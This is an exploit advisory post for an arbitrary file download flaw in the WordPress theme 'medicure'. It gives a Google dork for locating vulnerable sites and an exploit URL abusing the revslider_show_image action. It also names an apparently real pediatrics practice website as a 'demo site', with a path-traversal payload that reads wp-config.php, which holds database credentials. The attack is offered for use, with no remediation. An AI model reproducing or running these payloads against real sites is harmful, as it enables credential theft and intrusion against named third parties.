facebook facebook twitter rss

WordPress Theme medicure Arbitrary File Download Vulnerability

Author: Daya iLLi , Published: 07-11-2014
Exploit Title : WordPress Theme medicure Arbitrary File Download Vulnerability

Exploit Author : Daya iLLi

Date : 07/11/2014

Google Dork : inurl:"inurl:/wp-content/themes/medicure/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme medicure suffers from Arbitrary File Download Vulnerability.

Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://www.blackhillspediatrics.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

=============================================
Contact: http://www.facebook.com/DayaIlli.Officiel

Like us on Facebook :